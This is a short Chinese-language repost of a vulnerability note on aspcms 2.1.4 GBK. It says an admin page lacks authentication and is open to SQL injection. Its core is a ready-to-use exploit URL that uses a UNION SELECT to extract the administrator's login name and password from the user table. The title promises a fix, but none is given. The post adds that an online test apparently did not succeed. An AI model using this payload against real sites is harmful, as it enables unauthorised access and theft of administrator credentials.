aspcms 2.1.4 GBK版注入漏洞及修复 - 网站安全 - 自学

流浪的风

下载： http://www.2cto.com/ym/201108/29078.html

程序:aspcms2.1.4 GBK版

其他版本详细测试，貌似是只存在这个版本

admin/_content/_About/AspCms_AboutEdit.asp

未验证权限，且存在注入漏洞

利用EXP：

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1

如图

刚刚google了下，貌似在网上测试没成功。。。

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did11535

更新时间：2022-09-13 阅读：55次